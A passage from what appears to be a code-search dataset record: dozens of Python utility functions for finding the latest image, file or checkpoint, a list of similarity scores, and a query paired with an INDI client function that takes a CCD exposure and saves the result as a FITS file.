'SQUARESPACE_CACHEVERSION=') + 37]\n filename = str(url_to_down)[35:48] + \".jpg\"\n\n return [url_to_down, filename]", "def get_latest_iteration(path):\n glob = os.path.join(path, '{}_[0-9]*'.format(FILE_PREFIX))\n log_files = tf.io.gfile.glob(glob)\n\n if not log_files:\n raise ValueError('No log data found at {}'.format(path))\n\n def extract_iteration(x):\n return int(x[x.rfind('_') + 1:])\n\n latest_iteration = max(extract_iteration(x) for x in log_files)\n return latest_iteration", "def get_max_imgid(cursor: db.Cursor, table: str) -> int:\r\n res = cursor.execute(f\"SELECT MAX({cng.BBOX_DB_IMGRNR}) FROM {table}\")\r\n maxid: int = res.fetchall()[0][0]\r\n\r\n if maxid is None:\r\n return -1\r\n else:\r\n return maxid", "def find_image(image_name):\n imgs = pyrax.images\n image = imgs.list(name=image_name)[0]\n\n # print image.id\n return image.id", "def get_latest_image():\n return sqldb.get_latest_image()", "def _last_exp_id(name, path):\n\n exp_id = 0\n output_dirs = listdir(path)\n exp_dirs = [s for s in output_dirs if name in s]\n if exp_dirs:\n ids = [int(s.split('_')[-1]) for s in exp_dirs]\n exp_id = max(ids)\n return exp_id", "def get_latest_image_from_directory(self, motion_target_dir):\n try:\n # Use a glob generator to find the newest image\n return max(glob.iglob('{0}/*.jpg'.format(motion_target_dir)),\n key=os.path.getctime)\n except ValueError as e:\n # Raise an error if we did not find any images\n raise MotionAlertError(\"Could not find any images in motion \"\n \"target directory: \"\n \"{0}\".format(motion_target_dir))\n except OSError as e:\n # Raise an error if we cannot access the directory.\n raise MotionAlertError(\"Could not find the motion target dir: \"\n \"{0}\".format(e))", "def get_output_number(dst):\n data = os.listdir(dst)\n print(data)\n if not data == []:\n last_record = sorted(data)[-1]\n print(last_record)\n hiphen_index = last_record.rfind(\"-\")\n print(hiphen_index)\n print(int(last_record[hiphen_index + 1:]))\n return int(last_record[hiphen_index + 1:])\n return 0", "def _find_last_checkpoint(self):\n highest_num, last_checkpoint = -np.inf, None\n for filename in os.listdir(self.logdir):\n # checkpoints look like logdir/model.ckpt-N\n # self._save_path is \"logdir/model.ckpt\"\n if os.path.basename(self._save_path) in filename:\n try:\n N = int(filename.split(\"-\")[1].split(\".\")[0])\n if N > highest_num:\n highest_num = N\n last_checkpoint = \"model.ckpt-\" + str(N)\n except ValueError:\n pass\n return os.path.join(self.logdir, last_checkpoint)", "def find_last_history_version():\n current_max = -1\n for file in os.listdir(os.getcwd()):\n if len(file) > 12 and file[:12] == \"leg_history_\":\n try:\n current_max = max(int(file[12:]), current_max)\n except ValueError:\n continue\n return current_max", "def get_image_index(name: str):\n base_name = os.path.basename(name)\n nums = pattern.findall(base_name)\n if len(nums) != num_count:\n raise BaseException(f\"can't exact index from the string: {name}\")\n return float(nums[num_sort_index])", "def get_latest_image(dirpath, valid_extensions=('jpg','jpeg','png')):\n\n # get filepaths of all files and dirs in the given dir\n valid_files = [os.path.join(dirpath, filename) for filename in os.listdir(dirpath)]\n # filter out directories, no-extension, and wrong extension files\n valid_files = [f for f in valid_files if '.' in f and \\\n f.rsplit('.',1)[-1] in valid_extensions and os.path.isfile(f)]\n\n if not valid_files:\n raise ValueError(\"No valid images in %s\" % dirpath)\n\n return max(valid_files, key=os.path.getmtime)", "def new_images_index(self):\n first = ct.c_long()\n last = ct.c_long()\n self.lib.GetNumberNewImages(ct.pointer(first), ct.pointer(last))\n\n return (first.value, last.value)", "def get_oldest_image():\n return sqldb.get_oldest_image()", "def getLastPlotfile(outputDir, test):\n \n plotNum = -1\n \n # start by finding the last plotfile\n for file in os.listdir(outputDir):\n if (os.path.isdir(file) and file.startswith(\"%s_plt\" % (test))):\n key = \"_plt\"\n index = string.rfind(file, key)\n plotNum = max(int(file[index+len(key):]), plotNum)\n\n if (plotNum == -1):\n warning(\"WARNING: test did not produce any output\")\n compareFile = \"\"\n else:\n compareFile = \"%s_plt%5.5d\" % (test, plotNum)\n\n return compareFile", "def get_image_column_row(filename):\n row, column = os.path.splitext(filename)[0][-5:].split(\"_\")\n return (int(column) - 1, int(row) - 1)", "def get_image_id(filename):\n del filename\n global GLOBAL_IMG_ID\n GLOBAL_IMG_ID += 1\n return GLOBAL_IMG_ID", "def get_next_img(self, current_img):\n list = self.listImages.previews\n indx_next = (list.index(current_img) + 1) % len(list)\n next_img = list[indx_next]\n return next_img", "def image_id_at(self, i):\n return i", "def get_latest_file(path):\n try:\n latest_iteration = get_latest_iteration(path)\n return os.path.join(path, '{}_{}'.format(FILE_PREFIX, latest_iteration))\n except ValueError:\n return None", "def getNextImage(self):\n self._images = self._api.updateImageNames()\n \n # Get index from local txt file. \n # This ensures that the image queue does not reset if the Pola restarts.\n try: \n f = open(\"memoryIndex.txt\", 'r')\n self._currentIndex = int((f.read()))\n f.close()\n except: \n self._currentIndex = -1\n \n self._currentIndex = (self._currentIndex + 1) % len(self._images)\n \n f = open(\"memoryIndex.txt\", 'w')\n f.write(str(self._currentIndex))\n f.close()\n \n \n # If there is an internet connection, go online. If not, get the \"no wifi error\"- image queue\n try:\n urllib.request.urlopen('http://torabodin.com/')\n try: \n imageName = self._api.downloadImage(self._currentIndex)\n print(1, imageName)\n self._image= self.loadImage(imageName, True)\n print (self._image)\n \n except: \n self._image = self.getNextImage()\n \n except:\n self._image = self.loadImage(None, False)\n \n \n return self._image", "def findfigure(name):\n found = None\n if \".\" in name:\n if os.path.exists(name):\n found = name\n elif \".\" not in name:\n for suffix in (\".pdf\", \".eps\", \".ps\", \".JPG\", \".jpg\", \".png\"):\n testfile = name + suffix\n if os.path.exists(testfile):\n found = testfile\n if found is None:\n raise RuntimeError(\"Could not find image file {}\".format(name))\n return found, os.path.splitext(found)[-1]", "def get_latest_image(dirpath, valid_extensions=('jpg','jpeg','png')):\n global processed\n f = True\n valid_files = [os.path.join(dirpath, filename) for filename in os.listdir(dirpath)]\n new_files = [z for z in valid_files if not z in processed]\n processed.extend(new_files)\n #print(new_files,'\\n',processed)\n return new_files\n '''valid_files = [f for f in valid_files if '.' in f and f.rsplit('.',1)[-1] in valid_extensions and os.path.isfile(f)]\n if not valid_files:\n f = True\n else:\n f = False\n return max(valid_files, key=os.path.getmtime)'''", "def get_last_file(base_dir, pattern):\n base_dir = Path(base_dir)\n\n return sorted(base_dir.glob(pattern),\n key=lambda x: x.stat().st_ctime, reverse=True)[0]", "def _get_latest_chapter(self, directory):\n files = os.listdir(directory)\n if files:\n print(\"Last saved chapter: \", files[-1])\n last_chapter = files[-1][:-4]\n return self.indices.get(last_chapter, -1)\n return -1", "def get_imageId_from_fileName(filename):\n filename = os.path.splitext(filename)[0]\n if filename.isdigit():\n return int(filename)\n return id_iter", "def get_imageId_from_fackmask(filename):\n filename = os.path.splitext(filename)[0]\n regex = re.compile(r'\\d+')\n iid = regex.search(filename).group(0)\n image_id = int(iid)\n if filename.isdigit():\n return int(filename)\n return image_id", "def displayImage():\n f = open(os.path.join(\"outputColor\",\"epoch_total.txt\"),\"r\")\n epochNum = int(f.readline())\n f.close()\n return Image.open(\"outputPhotosColor/image_at_epoch_{:04d}.png\".format(epochNum))", "def next_image(self):\n return self.images.pop()", "def get_next_image(self):\n raise NotImplementedError", "def get_image_name_for_hook(module):\n os.makedirs(INSTANCE_FOLDER, exist_ok=True)\n base_name = str(module).split('(')[0]\n index = 0\n image_name = '.' # '.' is surely exist, to make first loop condition True\n while os.path.exists(image_name):\n index += 1\n image_name = os.path.join(\n INSTANCE_FOLDER, '%s_%d.png' % (base_name, index))\n return image_name", "def getLast(self):\n if self.last != None:\n return self.last.filename\n else:\n return None", "def get_next_cid(self) -> str:\n self.position += 1\n return \"img{}\".format(self.position)", "def find_step(self):\n for p in enumerate(self.get_decoder_paths()):\n full_path = p[1] + \".data-00000-of-00001\"\n file = Path(full_path)\n if not file.exists():\n return p[0]\n\n return -1", "def get_imageId_from_fileName(filename, id_iter):\n filename = os.path.splitext(filename)[0]\n if filename.isdigit():\n return int(filename)\n return id_iter", "def sort_key(path):\n file_end = path.rsplit(os.sep,1)[1]\n file_number = file_end.rstrip('.tif')\n return int(file_number)", "def fetch_last_model_file(self):\n try:\n filename = self.model_files[-1]\n return self.make_path(filename)\n except IndexError:\n return None", "def _find_tif_file(self):\n name = self.results_file.name[:-12] + \".tif\"\n try:\n tif_file = next(self.results_file.parent.glob(name))\n return tif_file\n except StopIteration:\n print(f\"Tif not found for {name}\")\n return None", "def most_recent_image(self, shape):\n size = np.array(shape).prod()\n arr = np.ascontiguousarray(np.zeros(size, dtype=np.int32))\n self.lib.GetMostRecentImage(arr.ctypes.data_as(ct.POINTER(ct.c_int32)),\n ct.c_ulong(size))\n return arr.reshape(shape)", "def last_segment(self):\n\t\tseg_sort = sorted(self.segments, key=lambda x: stringutil.extract_numbers(x.filename))\n\t\tif seg_sort:\n\t\t\treturn seg_sort[-1]\n\t\telse:\n\t\t\treturn None", "def image_path_from_index(self, index):\n for ext in self._image_ext:\n image_path = os.path.join(self._data_path, 'Images',\n index + ext)\n if os.path.exists(image_path):\n break\n assert os.path.exists(image_path), \\\n 'Path does not exist: {}'.format(image_path)\n\treturn image_path", "def get_latest_valid_picture(self):\n return self.buffer[self.buffer_index]", "def logdir():\n listdir = [xx for xx in os.listdir(\"runs/\") if os.path.isdir(os.path.join(\"runs\", xx))]\n\n max_ = 0\n for i in range(len(listdir)):\n try:\n filename = int(listdir[i])\n if max_ < filename:\n max_ = filename\n except ValueError:\n continue\n\n return str(max_ + 1)", "def findReferenceImage(modelfile):\n\n try:\n\n dirname = op.dirname(modelfile)\n prefixes = [getFIRSTPrefix(modelfile)]\n except ValueError:\n return None\n\n if prefixes[0].endswith('_first'):\n prefixes.append(prefixes[0][:-6])\n\n for p in prefixes:\n try:\n return fslimage.addExt(op.join(dirname, p), mustExist=True)\n except fslimage.PathError:\n continue\n\n return None", "def get_latest_revision(directory):\n latest_revision_found = -1\n for bench_file in os.listdir(directory):\n file_name_match = re.match('bench_r(\\d+)_(\\S+)', bench_file)\n if (file_name_match is None):\n continue\n revision = int(file_name_match.group(1))\n if revision > latest_revision_found:\n latest_revision_found = revision\n if latest_revision_found < 0:\n return None\n else:\n return latest_revision_found", "def image(images):\n return images[0]", "def get_last_framenumber(self):\n return self._frame_number", "def _get_latest_checkpoint_number(cls, checkpoints_dir):\n nums = cls._checkpoint_numbers(checkpoints_dir)\n if len(nums) == 0:\n return None\n else:\n return max(nums)", "def get_last_sprite(self) -> pygame.Surface:\n return self.__animation_dict[self.__animation_key][-1]", "def parse_image_id(image_ref):\n temp = image_ref.rsplit('/')\n #Return the last item, which is the image id\n return temp[len(temp) - 1]", "def image_path_at(self, i):\n return self.image_path_from_index(self._image_index[i])", "def image_path_at(self, i):\n return self.image_path_from_index(self._image_index[i])", "def search_up_img(self, next_partial_imgs_del):\n for img in next_partial_imgs_del:\n next = self.get_next_img(img) # if img is the last of the list the next returned is the first\n if next not in next_partial_imgs_del:\n return next", "def getLastFile(self):\n lastFile = None if len(self.recentFiles) == 0 else self.recentFiles[0]\n self.setLastPath(lastFile)\n return lastFile", "def get_filepath(image):\r\n extension = (len(image.split('/')[-1:][0]))\r\n return image[:-extension]", "def get_file_name(image_dir, image_name_prefix, current_count):\n if imageNumOn:\n # you could also use os.path.join to construct image path file_path\n file_path = image_dir+ \"/\"+image_name_prefix+str(current_count)+\".jpg\"\n else:\n right_now = datetime.datetime.now()\n file_path = (\"%s/%s%04d%02d%02d-%02d%02d%02d.jpg\"\n % (image_dir, image_name_prefix,\n right_now.year, right_now.month, right_now.day,\n right_now.hour, right_now.minute, right_now.second))\n return file_path", "def lastDigit(barcode):\r\n lastnumber = int(barcode[-1])\r\n return lastnumber", "def available_images_index(self):\n first = ct.c_long()\n last = ct.c_long()\n self.lib.GetNumberAvailableImages(ct.pointer(first), ct.pointer(last))\n\n return (first.value, last.value)", "def get_last_revision(filename):\n files = glob.glob(os.path.join(settings.INTERNET_DRAFT_ARCHIVE_DIR,filename) + '-??.txt')\n if files:\n sorted_files = sorted(files)\n return get_revision(sorted_files[-1])\n else:\n raise Exception('last revision not found in archive')", "def get_random_base():\n\n n_base = count_raw_img('base')\n img = \"{}.jpg\".format(random.randint(1, n_base + 1))\n return Image.open(RAW_DIR_PATH['base'] + img)", "def image_to_index(filename):\n return _image2image(filename)", "def __goToLastPage(self):\n try:\n self.currenturi = self.__baseuri + self.soup.find('li', \\\n 'lia-component-pagesnumbered').findAll('a', text=re.compile\\\n ('^\\d+$'))[-1].parent['href'].split(';')[0]\n self.__setSoupForCurrentUri()\n except:\n log.info(self.log_msg('Last page cannot find from the given page no \\\n for url %s'%self.task.instance_data['uri']))", "def get_last_time_step(dir):\n\n return str(max([fd for fd in listdir(dir) if fd.isnumeric()]))", "def get_last_id(statefile):\r\n\r\n debug_print('Getting last ID from %s' % (statefile,))\r\n try:\r\n f = open(statefile,'r')\r\n id = int(f.read())\r\n f.close()\r\n except IOError:\r\n debug_print('IOError raised, returning zero (0)')\r\n return 0\r\n debug_print('Got %d' % (id,))\r\n return id", "def get_img_index(pred_result: List) -> List:\n img_index = []\n\n for i, line in enumerate(pred_result):\n match = re.search(\"\\./test_pics/\", line)\n if match:\n img_index.append(i)\n if i == len(pred_result) - 1:\n img_index.append(i)\n return img_index", "def getFrameNumber(fileName, jointNumber):\n with open(fileName) as f:\n for i, l in enumerate(f):\n pass\n return (i+1)//jointNumber", "def latestShotNumber():\n\tconn = _mds.Connection(_pref._HBT_SERVER_ADDRESS+':8003');\n\tshot_num = conn.get('current_shot(\"hbtep2\")')\n\treturn int(shot_num)", "def calculting_name():\n\n list_of_files = glob.glob('./muestras/*') # * means all if need specific format then *.csv\n latest_file = max(list_of_files, key=os.path.getctime)\n _, name_file = os.path.split(latest_file)\n name, _ = os.path.splitext(name_file)\n name_number = str(name)\n\n return name_number", "def get_last_page_num(page):\n start_link = page.find('<div class=\"pagenav\"')\n if start_link == -1:\n return None\n start_quote = page.find('>Page', start_link)\n end_quote = page.find('</td>', start_quote)\n end_num = long(page[start_quote + 11:end_quote])\n return end_num", "def get_current_prediction_output_path(prediction_output_base_path: str, image_name: str) -> str:\n dirs = [(prediction_output_base_path + d) for d in os.listdir(prediction_output_base_path)]\n newest_dir = max(dirs, key=os.path.getmtime)\n return newest_dir + '/' + image_name.replace('/', '')", "def wiki_image(pagetext):\n images = [i for i in pagetext.images if i not in EXCLUDED_IMAGES]\n if len(images) > 0:\n return images[0]\n else:\n return ''", "def get_last_game_id():\n\t\ttry:\n\t\t\tf = open(game_id_file, 'r')\n\t\t\tid = int(f.read())\n\t\t\tf.close()\n\t\texcept IOError:\n\t\t\tprint('IOError raised, returning zero (0)')\n\t\t\treturn 0\n\t\treturn id", "def get_image(id_num):\n return sqldb.get_image(id_num)", "def get_new_image(self):\n return self.vid_mem_reader.get_latest_image()[0]", "def get_nth_filepath(self, n):\n return self.get_filepaths()[n] if n < len(self.get_filepaths()) else None", "def image_path_at(self, i):\n image_path = os.path.join(self._image_path, self._image_index[i])\n assert os.path.exists(image_path), \\\n 'Path does not exist: {}'.format(image_path)\n return image_path", "def get_filename(img_path):\n filename = os.path.splitext(img_path)\n return os.path.basename(filename[0])", "def get_remaining_images(elastix_output_dir):\n reg_imgs = glob.glob(os.path.join(elastix_output_dir, \"reg_image_*\"))\n n_reg_imgs = len(reg_imgs)\n #mov_imgs = glob.glob(os.path.join(moving_image_dir, \"*.tif\"))\n #n_mov_imgs = len(mov_imgs)\n return n_reg_imgs", "def last_index(self) -> int:\n return self._last_index", "def image_path_at(self, i):\n return self.image_path_from_index(self.image_index[i])", "def find_last_step(dbpath):\n #~ if not isinstance(dbpath,OdbType):\n odb = openOdb(path=dbpath)\n _steps = odb.steps.keys()\n last_step = _steps[-1]\n # odb.close() <- This failed\n return last_step", "def _find_last_numeric_subdir(self):\n existing_subdirs = os.walk(self.base_data_dir).next()[1]\n \n # Remove any subdirs which contain alphabetic characters\n numeric_subdirs = [subdir for subdir in existing_subdirs \n if not any(char.isalpha() for char in subdir)]\n\n if numeric_subdirs:\n numeric_subdirs.sort()\n return numeric_subdirs[-1]", "def get_image_name(folder, row, column, w_n):\n image_names = get_image_names(folder)\n img_name = \"\"\n column = str(column).zfill(2)\n s_re = re.compile(r\"{}{}_w{}\".format(row, column, w_n))\n for img in image_names:\n if re.search(s_re, img) is not None:\n img_name = img\n break\n if img_name == \"\":\n return None\n folder += img_name\n return folder", "def advance_image():\n # pylint: disable=global-statement\n global current_image\n if current_image is not None:\n current_image += 1\n if current_image is None or current_image >= len(file_list):\n current_image = 0\n load_image()", "def lastPath(self, toNative=True):\n return self.paths(toNative=toNative)[-1]", "def get_last_number(s:str):\n array = re.findall(r'[0-9]+', s)\n if array.__len__() is 0:\n return -1\n return int(array[-1])", "def load_next_image(self):\n # Did we finish an epoch?\n if self._cur == len(self.indexlist):\n self._cur = 0\n shuffle(self.indexlist)\n\n # Load an image\n index = self.indexlist[self._cur] # Get the image index\n # Load and prepare ground truth\n multilabel = np.zeros(20).astype(np.int32)\n anns = load_pascal_annotation(index, self.pascal_root)\n for label in anns['gt_classes']:\n # in the multilabel problem we don't care how MANY instances\n # there are of each class. Only if they are present.\n # The \"-1\" is b/c we are not interested in the background\n # class.\n multilabel[label - 1] = 1\n\n self._cur += 1\n return index, multilabel", "def get_prefix() :\n \n import glob\n filenames = glob.glob(picture_folder+'*.jpg')\n max_prefix = 0\n for filename in filenames :\n parts = filenames.split('_')\n if len(parts) > 1 :\n possible_prefix = parse_int(parts[0])\n if possible_prefix > max_prefix :\n max_prefix = possible_prefix\n \n max_prefix += 1\n return '%04d' % max_prefix", "def get_recent_images(num_images=30):\n folder = app.config['UPLOAD_FOLDER']\n\n init_image_info()\n\n # get list of last modified images - ignore .json file and files start with .\n files = ['/'.join((folder, file)) \\\n for file in os.listdir(folder) if ('json' not in file) \\\n and not (file.startswith('.')) ]\n\n # list of tuples (file_path, timestamp)\n last_modified_files = [(file, os.path.getmtime(file)) for file in files]\n print(last_modified_files)\n last_modified_files = sorted(last_modified_files,\n key=lambda t: t[1], reverse=True)\n num_stored_images = len(last_modified_files)\n\n # build a list of image information\n image_stats = []\n\n print(\"THE NUMBER OF STORED IMAGES IS: {}\".format(num_stored_images))\n\n if num_stored_images != 0:\n\n # read in image info\n with open(IMAGE_INFO_JSON, 'r') as f:\n info = json.load(f)\n\n for i, f in enumerate(last_modified_files):\n # set limit for rendering pictures\n if i > num_images: break\n\n path, filename = f[0], f[0].replace(folder, '').replace('/', '')\n cur_image_info = info.get(filename, {})\n\n print(\"CURRENT IMAGE INFO IS: {}\".format(cur_image_info))\n\n img = {\n 'path': path,\n 'labels': cur_image_info\n }\n print(\"CURRENT IMG LABEL DATA IS: {}\".format(img['labels']))\n image_stats.append(img)\n\n return image_stats, num_stored_images", "def get_binary_image_name(folder, row, column):\n image_names = get_image_names(folder)\n img_name = \"\"\n column = str(column).zfill(2)\n s_re = re.compile(r\"{}{}\".format(row, column))\n for img in image_names:\n if re.search(s_re, img) is not None:\n img_name = img\n break\n if img_name == \"\":\n return None\n folder += img_name\n return folder", "def get_image_ref() -> str:\n images_rq = request(\n method=\"GET\", url=app.config[\"IMAGE_REF\"], headers=build_header(),\n )\n if not images_rq.ok:\n HTTPError(f\"Can not get image id for virtual machine: {images_rq.status_code}\")\n\n [image] = images_rq.json()[\"images\"]\n return image[\"id\"]", "def remove_extra_images(path_to_images: str, number_of_images: int) -> None:\n last_image = 'image' + str(number_of_images) + '.jpg'\n while last_image in listdir(path_to_images):\n last_image_path = path.join(path_to_images, last_image)\n remove(last_image_path)\n print(f\"remove {last_image}\")\n number_of_images += 1\n last_image = 'image' + str(number_of_images) + '.jpg'", "def get_last_file(log_dir):\n last_date = 0\n last_ext = \"\"\n last_filename = \"\"\n FileInfo = namedtuple('FileInfo', 'path date ext')\n file_mask = r\"^nginx-access-ui\\.(log-(\\d{8})$|log-(\\d{8}).gz$)\"\n try:\n for file in os.listdir(log_dir):\n match = re.search(file_mask, file)\n if match:\n try:\n file_date = match.group(1).split(\"-\")[1].split('.')\n if int(file_date[0]) > last_date:\n last_date = int(file_date[0])\n try:\n last_ext = match.group(1).split('.')[1]\n except:\n last_ext = ''\n last_filename = match.group(0)\n except:\n pass\n except:\n MAIN_LOGGER.error(\"No such directory %s\", log_dir)\n return None\n\n if not last_filename:\n MAIN_LOGGER.info(\"no files to parse\")\n return None\n\n MAIN_LOGGER.info(\"got last file\")\n return FileInfo(os.path.join(os.path.dirname(__file__), log_dir, last_filename),\n str(last_date), last_ext)", "def state(self):\n return self.last_image", "def locateImageOnScreen(ImageName):\n location = pyautogui.locateOnScreen(ImageName) \n try: \n for x in location:\n return location\n except:\n sys.exit('The image could not be found in the active screen. \\n'+'Stopping program.')" ]
[ "0.7381124", "0.71163946", "0.6752403", "0.65669954", "0.651449", "0.6455671", "0.6257701", "0.62144595", "0.61207634", "0.6083774", "0.60167074", "0.6005787", "0.5981818", "0.59797287", "0.5971447", "0.597075", "0.59043884", "0.5898508", "0.58921754", "0.5875937", "0.581396", "0.5812782", "0.57936674", "0.57638973", "0.5762741", "0.5760847", "0.57509756", "0.57318723", "0.5723892", "0.5679276", "0.5674129", "0.56514424", "0.56298864", "0.5594666", "0.5594367", "0.5570788", "0.5568176", "0.5553805", "0.5546389", "0.5541378", "0.5539164", "0.55365556", "0.55156547", "0.5505156", "0.550112", "0.5499522", "0.5498924", "0.5493709", "0.5464193", "0.5460812", "0.54534763", "0.54521334", "0.5451145", "0.5445272", "0.5442534", "0.54397446", "0.54397446", "0.54360324", "0.5435996", "0.54342103", "0.5431329", "0.5431326", "0.54271144", "0.5426188", "0.5420813", "0.54093957", "0.54066586", "0.53927433", "0.538995", "0.53898734", "0.538018", "0.53793395", "0.5369004", "0.5368942", "0.5365227", "0.5363314", "0.53601295", "0.5357875", "0.5356099", "0.53540593", "0.53524095", "0.53485227", "0.5346489", "0.53411895", "0.53396684", "0.53381836", "0.5328591", "0.530909", "0.53074056", "0.530715", "0.5297787", "0.52776945", "0.52773345", "0.52762735", "0.5274947", "0.5271646", "0.5267805", "0.52612025", "0.52556103", "0.52555853" ]
0.7685043
0
Sends an exposure command to the CCD given the type of frame and exposure time. The received BLOB is of FITS type and is
def exposure(frameType, expTime): blobEvent.clear() # set the specified frame type if frameType.lower() == 'light': ccd_frame[0].s = PyIndi.ISS_ON ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) elif frameType.lower() == 'bias': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_ON ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) elif frameType.lower() == 'dark': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_ON ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) elif frameType.lower() == 'flat': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_ON indiclient.sendNewSwitch(ccd_frame) # set the value for the next exposure ccd_exposure[0].value=expTime indiclient.sendNewNumber(ccd_exposure) # wait for the exposure blobEvent.wait() for blob in ccd_ccd1: # pyindi-client adds a getblobdata() method to IBLOB item # for accessing the contents of the blob, which is a bytearray in Python image_data=blob.getblobdata() # write the byte array out to a FITS file global imgNum global imgName imgNum += 1 fileName = fileDir+'raw-'+str(imgNum).zfill(8)+'.fits' f = open(fileName, 'wb') f.write(image_data) f.close() imgName = fileName return fileName
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def expose(self, cmd, expTime, expType):\n\n if not expType:\n expType = 'test'\n if cmd:\n cmd.inform('exposureState=\"exposing\"')\n if expType not in ('bias', 'test') and expTime > 0:\n time.sleep(expTime + self._exposureOverheadTime())\n\n if cmd:\n cmd.inform('exposureState=\"reading\"')\n\n f = pyfits.open('/home/chyan/mhs/data/mcs/schmidt_fiber_snr400_rmod71.fits')\n image = f[0].data\n # image = numpy.random.normal(self.biasLevel,\n # scale=self.readNoise,\n # size=self.imageSize).astype('u2')\n\n if expType != 'test':\n time.sleep(self._readoutTime())\n return image", "def tcs_exposure_request(image_type, duration = 0, number = 1):\n\n\tvalid_types = ['THERMAL','DARK', 'BIAS', 'FLAT','OBJECT']\n\tvalid = image_type in valid_types\n\n\tif valid:\n\t\timage_type = image_type.lower()\n\t\tif image_type == 'dark':\n\t\t\timage_type = 'thermal'\n\n\t\tif number < 1:\n\t\t\tlogger.error('Invalid number of exposures requested')\n\t\t\trespond = set_err_codes.STATUS_CODE_EXPOSURE_NOT_STARTED\n\t\t\treturn respond\n\n\t\tif duration <0:\n\t\t\tlogger.error('Invalid exposure time requested')\n\t\t\trespond = set_err_codes.STATUS_CODE_EXPOSURE_NOT_STARTED\n\t\t\treturn respond\n\n\t\tcommand_str = 'expose ' + image_type\n\t\tif number != 1:\n\t\t\tcommand_str += ' '+str(number)\n\t\tif image_type != 'bias':\n\t\t\tcommand_str += ' ' + str(duration)\n\t\t\n\t\ttry:\n\t\t\ttcs_respond = send_command(command_str)\n\t\t\n\t\texcept:\n\t\t\trespond = set_err_codes.STATUS_CODE_EXPOSURE_NOT_STARTED\n\t\telse:\n\t\t\t\n\t\t\tcam_temp = get_camera_status()[2]\n\t\t\t#if good_response and cam_temp>-20:\n\t\t\tif float(cam_temp)>-20:\n\t\t\t\trespond = set_err_codes.STATUS_CODE_CCD_WARM\n\t\n\t\t\telse:\n\t\t\t\trespond = set_err_codes.STATUS_CODE_OK\n\t\t\t\n\t\treturn respond\n\n\telse:\n\t\tlogger.error('Invalid image type provided to exposure request '+str(\n\t\t\t\timage_type))\n\t\tprint('Invalid image type provided to exposure request'+str(\n\t\t\timage_type))", "def expose(self, cmd):\n\n expType = cmd.cmd.keywords[0].name\n if expType in ('bias', 'test'):\n expTime = 0.0\n else:\n expTime = cmd.cmd.keywords[\"expTime\"].values[0]\n\n filename, image = self._doExpose(cmd, expTime, expType)\n cmd.finish('exposureState=done')", "def _doExpose(self, cmd, expTime, expType):\n \n image = self.actor.camera.expose(cmd, expTime, expType)\n filename = self.getNextFilename(cmd)\n pyfits.writeto(filename, image, checksum=False, clobber=True)\n cmd.inform(\"filename=%s\" % (qstr(filename)))\n \n return filename, image", "def exp(self, exposure_time):\n print(f\"exp: {exposure_time}\")\n self.device_control.exposure = exposure_time\n yield", "def Exposure(self, time):\r\n IS_EXPOSURE_CMD_SET_EXPOSURE = 12 #there is a whole list to implement\r\n TIME = DOUBLE(time)\r\n nSizeOfParam = 8\r\n CALL('Exposure', self, \r\n UINT(IS_EXPOSURE_CMD_SET_EXPOSURE), \r\n byref(TIME), \r\n UINT(nSizeOfParam))", "def expose(self):\n if self.camera is None: # test mode -- immediately return test image\n print(\"NO SPECTRAL CAMERA FOUND -- USING TEST DATA\")\n self.filename = \"example_fits_files/Mooi\"\n return\n\n exposure_time = self.time.get()\n try:\n self.exposure_time = float(exposure_time)\n except:\n message = \"Exposure time \\\"{0}\\\" cannot be converted to floating point number\".format(exposure_time)\n messagebox.showerror(\"Error\", message)\n raise ValueError(message)\n filename = \"spectra/{0}\".format(timestamp())\n self.camera.spectrum(self.exposure_time, filename)\n self.filename = filename", "def set_exposure(self, exposure):\n self.logger.info(f'Setting exposure to {exposure}')\n self._driver.ExposureTime.SetValue(exposure)", "def setExposureTime(self, cmd, expTime):\n\n pass", "def command(self, value):\n for ii in range(0, len(exposure_mode_names)):\n if value == exposure_mode_names[ii]: break\n self.tcp_comms.tcp_params.exposureMode = ii\n self.tcp_comms.send_exposure_mode(self.tcp_comms.tcp_params.exposureMode)", "def Expose(self, fitsfile, seconds=5):\n # make sure the file has good name\n if not fitsfile.endswith('.fits'):\n fitsfile += '.fits'\n tstamp = datetime.now().strftime('_%y%m%d-%H%M')\n match = re.match(r'.*(_\\d\\d\\d\\d\\d\\d-\\d\\d\\d\\d)\\.fits', fitsfile)\n if not match:\n fitsfile = fitsfile[:-5] + tstamp + '.fits'\n elif match.group(1) != tstamp:\n fitsfile = fitsfile[:-17] + tstamp + '.fits'\n \n fitsfile = path.join(self.datapath, fitsfile)\n\n self.lastfile = fitsfile\n log.info(\"Starting new exposure, filename=%s\",\n path.basename(self.lastfile))\n args = ['./CCDDExposeDB.py', str(seconds), fitsfile, \n self.outputMetadata]\n if self.lastimgpath:\n args.append(self.lastimgpath)\n return self._run(args, \n env=dict(IMAGEDB_URI=self.imagedb_uri,\n IMAGEDB_COLLECTION=self.imagedb_collection)\n )", "def expose(self):\n\n ## Determine type of exposure (exp, series, stack)\n exptype = str(self.exptypeComboBox.currentText())\n mode = self.modedict[exptype]\n\n ## Get exposure parameters\n if mode == \"bias\":\n exptime = 0.0\n else:\n exptime = self.exptimeSpinBox.value()\n imcount = self.imstackSpinBox.value()\n seqnum = self.imnumSpinBox.value()\n mintime = self.minexpSpinBox.value()\n maxtime = self.maxexpSpinBox.value()\n step = self.tstepSpinBox.value()\n\n ## Determine filter kwargs\n if self.filterToggleButton.isChecked():\n kwargs = {'filter_name' : str(self.filterComboBox.currentText())}\n else:\n kwargs = {'monowl' : self.monoSpinBox.value()}\n\n if self.testimCheckBox.isChecked():\n title = 'test'\n else:\n title = str(self.imtitleLineEdit.text())\n\n ## Build filepath\n filepath = os.path.join(str(self.imfilenameLineEdit.text()),title)\n \n ## Check if single exposure\n if exptype in [\"Exposure\", \"Dark\", 